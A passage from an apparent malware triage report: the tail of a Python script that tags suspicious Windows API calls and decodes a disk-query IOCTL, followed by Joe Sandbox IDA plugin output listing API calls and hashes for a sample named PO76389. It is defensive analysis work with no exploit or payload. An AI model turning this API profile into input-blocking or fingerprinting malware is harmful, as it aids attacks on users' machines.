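    "InternetReadFile": "HTTP download via WinINet",
    "SendInput": "synthetic keyboard/mouse input",
    "keybd_event": "synthetic keyboard input",
    "AdjustTokenPrivileges": "token privilege manipulation",
}


def triage(text: str) -> list:
    findings = []
    for call in parse_api_lines(text):
        tag = TRIAGE_TAGS.get(call.api)
        if tag is None:
            continue
        finding = {"api": call.api, "module": call.module, "ref": f"{call.ref:08X}", "tag": tag}
        # DeviceIoControl(hDevice, dwIoControlCode, lpIn, nInSize, lpOut, nOutSize, lpReturned, lpOverlapped)
        if call.api == "DeviceIoControl" and len(call.args) >= 6 and call.args[1] is not None:
            finding["ioctl"] = decode_ioctl(call.args[1])
            finding["in_size"] = call.args[3]      # 0xC matches sizeof(STORAGE_PROPERTY_QUERY)
            finding["out_size"] = call.args[5]     # 0x28 matches sizeof(STORAGE_DEVICE_DESCRIPTOR)
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_API_LINES):
        print(f)
```

For the DeviceIoControl record the decoder yields device type 0x2D, function 0x500, METHOD_BUFFERED, which is IOCTL_STORAGE_QUERY_PROPERTY, and the 12-byte input / 40-byte output buffers are the sizes of STORAGE_PROPERTY_QUERY and STORAGE_DEVICE_DESCRIPTOR: a disk vendor/product/serial query, a primitive commonly used for hardware fingerprinting. Whether this sample uses it for that is not established by the report; the decoder only tells you what to look at.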
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0051F59C
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0052F3AD,?,?,?,?), ref: 0051F5C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: f9a3ab751b409d84d2741c3e833e909371ec56f808ee1b54f953332df0f5c057
                                                    • Instruction ID: efafb12ee2e6dc96b8fbce523b1436ea19ce968c665ff36a2c6bab9af8b578ff
                                                    • Opcode Fuzzy Hash: f9a3ab751b409d84d2741c3e833e909371ec56f808ee1b54f953332df0f5c057
                                                    • Instruction Fuzzy Hash: 8AE04630104218BBEB140F09EC0AFB93A69FB00B50F108926F916880E0D7B188A0E660
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,004B125D,004D7A43,004B0F35,?,?,00000001), ref: 004D8E41
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004D8E4A
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 272f67a49063f2b821266377434a100e451c77e75c3d79590908ba3f269742a0
                                                    • Instruction ID: 5dd64676e5723fe3a5425e27f4b4a7b4d8d9ca5f3db53535470390ad1cbd1d48
                                                    • Opcode Fuzzy Hash: 272f67a49063f2b821266377434a100e451c77e75c3d79590908ba3f269742a0
                                                    • Instruction Fuzzy Hash: 5EB09271044A08ABEA802BA1FC09B883F78EB18A62F004410F61D852608B635854AAA2
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID:
                                                    • API String ID: 3964851224-0
                                                    • Opcode ID: 1560927b6bde47dc76ee9e4651da43f39eedd49f6213eb8914ed4dfae072f7b7
                                                    • Instruction ID: 703aeabff22674577a4587a35b7399fb203890259f54c81e2e915c8c5aff9a29
                                                    • Opcode Fuzzy Hash: 1560927b6bde47dc76ee9e4651da43f39eedd49f6213eb8914ed4dfae072f7b7
                                                    • Instruction Fuzzy Hash: 13929C746083018FD764DF19C490F6ABBE0BF89308F14885EE98A8B392D779ED45CB56
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 686410f650a5d93ae00e0702a561ee1009ad979be5a2926bd42764179638f85e
                                                    • Instruction ID: 4aa2e26c58c16edbd6f41b1477648079159f75888e43c29bd733d6f2d9f7ff91
                                                    • Opcode Fuzzy Hash: 686410f650a5d93ae00e0702a561ee1009ad979be5a2926bd42764179638f85e
                                                    • Instruction Fuzzy Hash: 2FB1E024D2AF504ED62396398835336B75CAFBB2C9F91D71BFC2A70D22FB2185875180
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00520352
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: 6d6a303898dc02ac78fdba633dd859e36d5c4ecb0cbc53c022b78fe2865d1a40
                                                    • Instruction ID: 311c6b77ea1a89adf2f21d5a563f68e72962a8ff47e6c486cc77475889d61ce3
                                                    • Opcode Fuzzy Hash: 6d6a303898dc02ac78fdba633dd859e36d5c4ecb0cbc53c022b78fe2865d1a40
                                                    • Instruction Fuzzy Hash: 0C112731205235ABFB249B2CEC49FB93F24FF56720F244719F9215A1E3CA605D40E2A9
                                                    APIs
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0051E7AF
                                                    Similarity
                                                    • API ID: Window$CallLongProc
                                                    • String ID:
                                                    • API String ID: 4084987330-0
                                                    • Opcode ID: a969d6d6ed1c03b3ed0e876eba032d46f51082db0b1e1bae0cc91804c3863d77
                                                    • Instruction ID: 5c60c03e35d8d4781cf031180c8c9bd5f3bd64b50c9320d6da335b942e640e16
                                                    • Opcode Fuzzy Hash: a969d6d6ed1c03b3ed0e876eba032d46f51082db0b1e1bae0cc91804c3863d77
                                                    • Instruction Fuzzy Hash: 4DF0EC36100149AFEF05AF54EC45DB93FA6FB04361B048518FD159A6A1CB329DA0EBA5
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                      • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                      • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0052F417,?,?,?,?,?,00000001,?), ref: 0051EA9C
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                    • String ID:
                                                    • API String ID: 2356834413-0
                                                    • Opcode ID: 06c3f5b603f361df0952d7b7e76552d65d2f25c9b746905b0f50922e728f09e7
                                                    • Instruction ID: 9de0cd9fd975e03e6d7542fb6075b5fe737cb6f12f2e5501f5b016d7bc6e0640
                                                    • Opcode Fuzzy Hash: 06c3f5b603f361df0952d7b7e76552d65d2f25c9b746905b0f50922e728f09e7
                                                    • Instruction Fuzzy Hash: C2F0A035200229ABDB14AF19DC0AEBE3FA1FF00794F044019FD1A1A1A1D77698B1EBE5
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,004CAF40,?,?,?,?,?), ref: 004CB83B
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: 9afa1f77e71bb099eec76f4a81172a671d35b115446a98f1191b1af954074497
                                                    • Instruction ID: e62c90ee70997b26a7d79edadd6878c67132977ef8fbe926ee978f1a71714d6e
                                                    • Opcode Fuzzy Hash: 9afa1f77e71bb099eec76f4a81172a671d35b115446a98f1191b1af954074497
                                                    • Instruction Fuzzy Hash: 8FF054345002099FDB14AF18E851E393BB6FB15360F10412DF956472A1D771D860FBA5
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00507057
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: c31118b359e63b14f4b73b837e4a564745feabf1b5f112daafdbcf2f663ca3b8
                                                    • Instruction ID: ef3789008aeb417bb87717b447286872985036ecf3c3e96f430c9a130e28e859
                                                    • Opcode Fuzzy Hash: c31118b359e63b14f4b73b837e4a564745feabf1b5f112daafdbcf2f663ca3b8
                                                    • Instruction Fuzzy Hash: 85E012366142049FC7109B6AD859E9AB7ECAF58750F00842BB945D7291DAB4E8049BA0
                                                    APIs
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0051F41A
                                                    Similarity
                                                    • API ID: DialogNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3239928679-0
                                                    • Opcode ID: 8976b4b8a40ef1434f2ad5df5ecbd0bbb617ac2eb6fdd5639379e517a840c25a
                                                    • Instruction ID: 53223d305fb22b8a4cc8cf4abff39967067f4be4c509e3cd120a9fff629f3dd9
                                                    • Opcode Fuzzy Hash: 8976b4b8a40ef1434f2ad5df5ecbd0bbb617ac2eb6fdd5639379e517a840c25a
                                                    • Instruction Fuzzy Hash: E1F06D32200649AFDB21DF58EC09FD63FA5FB15360F148418BA25672E1CB716860E7A5
                                                    APIs
                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 004F7DF8
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: a791a73110f11c7ccac1c3446b0ab37200a28e18cc677823eff44ce49605ac84
                                                    • Instruction ID: 9117a59b7f989b2817a0310d4a4206a83bfcad1fb24b813bfc77bf396e9e4a0a
                                                    • Opcode Fuzzy Hash: a791a73110f11c7ccac1c3446b0ab37200a28e18cc677823eff44ce49605ac84
                                                    • Instruction Fuzzy Hash: 69D09EA516C60E79FD5907209C2FFBB1119EB517C1FE4564BB301C62C1ECDC6845643D
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 004CACC7
                                                    Similarity
                                                    • API ID: DialogLongNtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 2065330234-0
                                                    • Opcode ID: 693fdf38433280f2c783828e304c305d511a4397eb55a51e62f15bb61dd875a8
                                                    • Instruction ID: fc1f8a5f5f7810b4654b1348b4648fa94badea1d49658d924094ea9f8ed69426
                                                    • Opcode Fuzzy Hash: 693fdf38433280f2c783828e304c305d511a4397eb55a51e62f15bb61dd875a8
                                                    • Instruction Fuzzy Hash: 77E08C35100208FBCF04AF94EC01F243B36FB48348F10801CF6194A2A1CB33A422FB15
                                                    APIs
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0052F3D4,?,?,?,?,?,?), ref: 0051F450
                                                      • Part of subcall function 0051E13E: _memset.LIBCMT ref: 0051E14D
                                                      • Part of subcall function 0051E13E: _memset.LIBCMT ref: 0051E15C
                                                      • Part of subcall function 0051E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00573EE0,00573F24), ref: 0051E18B
                                                      • Part of subcall function 0051E13E: CloseHandle.KERNEL32 ref: 0051E19D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                    • String ID:
                                                    • API String ID: 2364484715-0
                                                    • Opcode ID: 41ab25e44d10eae5661869766d493dc13e31814bc1ac6ca2245a74064d43b398
                                                    • Instruction ID: 249493e477c5b1f23e9de0492ec0611a8fbece98ff39e0e8810d92c26e8cb304
                                                    • Opcode Fuzzy Hash: 41ab25e44d10eae5661869766d493dc13e31814bc1ac6ca2245a74064d43b398
                                                    • Instruction Fuzzy Hash: 31E01232100209EFDB01AF48EC05E963BB2FB08350F008010FA04572B1C771ACA0EF51
                                                    APIs
                                                    • NtdllDialogWndProc_W.NTDLL ref: 0051F3A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3239928679-0
                                                    • Opcode ID: 536bb026cc131ff438f167ee8ccbb211be85986006090aa1077775df9b54b37f
                                                    • Instruction ID: efd384ec4f3554b10997682226f65d3aee7334e2e2a1f7f8b8b0d39ff4055046
                                                    • Opcode Fuzzy Hash: 536bb026cc131ff438f167ee8ccbb211be85986006090aa1077775df9b54b37f
                                                    • Instruction Fuzzy Hash: B5E0E23520420CEFCB01DF88EC44E863BA5FB2A350F000054FD048B361C772A830EB62
                                                    APIs
                                                    • NtdllDialogWndProc_W.NTDLL ref: 0051F3D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DialogNtdllProc_
                                                    • String ID:
                                                    • API String ID: 3239928679-0
                                                    • Opcode ID: 4530d2669a63ecf28c6555ab841044114922108d4db0b8c7d974e4dd443eaad9
                                                    • Instruction ID: aec6f834f9ff465a30ad922716bfdeee2749a036e003abd32ff758be7590e54e
                                                    • Opcode Fuzzy Hash: 4530d2669a63ecf28c6555ab841044114922108d4db0b8c7d974e4dd443eaad9
                                                    • Instruction Fuzzy Hash: 7AE0E23520020CEFCB01DF88E844E863BA5FB2A350F000054FD048B362C772A874EBA2
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                      • Part of subcall function 004CB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004CB85B), ref: 004CB926
                                                      • Part of subcall function 004CB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 004CB9BD
                                                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,004CAF1E,?,?), ref: 004CB864
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                    • String ID:
                                                    • API String ID: 2797419724-0
                                                    • Opcode ID: e7cf8271873f9827a2f5d868b0f182680abee1432455bda249be013a0d36d966
                                                    • Instruction ID: 644c5d6aa93a5e080b92c2423e0e74513738e41e1deb2ae884bc2e901ace0a25
                                                    • Opcode Fuzzy Hash: e7cf8271873f9827a2f5d868b0f182680abee1432455bda249be013a0d36d966
                                                    • Instruction Fuzzy Hash: 99D0127514430C77DB103B66EC07F493E6DEB10754F50842DF605691E18B766420B5BD
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 7a02b4276d7fe75c469021ebc7cd110832a92e2d61546a2ff8872db639c6aa3b
                                                    • Instruction ID: 37d858c9a643de2cf0ea8e15aff1ea8b884f43ef1af89474732bd0039ac344bd
                                                    • Opcode Fuzzy Hash: 7a02b4276d7fe75c469021ebc7cd110832a92e2d61546a2ff8872db639c6aa3b
                                                    • Instruction Fuzzy Hash: 46C04CB140401DDFD715CB80D9499EFB7BCBB14300F104495A115E1140D7709B459B71
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004D8E1F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 4c57746095bbec24639338e4ca5d1d0878b3746848726be699e092cabaec55a4
                                                    • Instruction ID: 4cf943df9b69f32bb2e1efac5a7b956e88ba0c4b13491cc03be9de2783574d86
                                                    • Opcode Fuzzy Hash: 4c57746095bbec24639338e4ca5d1d0878b3746848726be699e092cabaec55a4
                                                    • Instruction Fuzzy Hash: 7CA0243000050CF7CF001F51FC044447F7CD7041507004010F40C41131C7335C1055D1
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(004D6AE9,005667D8,00000014), ref: 004DA937
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 630bcbcfec3cd3f93bb8b9c043607580e5aa51b308d499465e10d96d3e1cf12c
                                                    • Instruction ID: 20740c7f761e930f9ceb432e5b1f6231eb8c56b68af69659e7c6062a416d8d85
                                                    • Opcode Fuzzy Hash: 630bcbcfec3cd3f93bb8b9c043607580e5aa51b308d499465e10d96d3e1cf12c
                                                    • Instruction Fuzzy Hash: 1CB012B03031028BD7084B38FC5411A79F45759101301503D7407C36A0DB308454FF00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                    • Instruction ID: d7c450a05304a7b8df95740e122e2e54414d041f643437ea2c958e9208378171
                                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                    • Instruction Fuzzy Hash: 06C1D37220519349DF2D463AC43453FFAA15AB27B171A07AFD8B3CB7D0EE28C564D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                    • Instruction ID: ee1276db8fe123698a3947527a5b5bdabf0f3ed0a5f5c4fca6921ce264d4e3a8
                                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                    • Instruction Fuzzy Hash: E1C1A5722051934ADF2D4639C47453FBAA15AB27B131A076FD8B3CB7E4EE2CC524D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                    • Instruction ID: f75f94b3e2d802c6c6bc6ade5a26789d1f10ac9b0e772c049a7d2f6efbccfa53
                                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                    • Instruction Fuzzy Hash: 05C1C27220919349DF2D8639843463FBBA15AB27B5B1A076FD4B3CB7C0EE28D524D624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
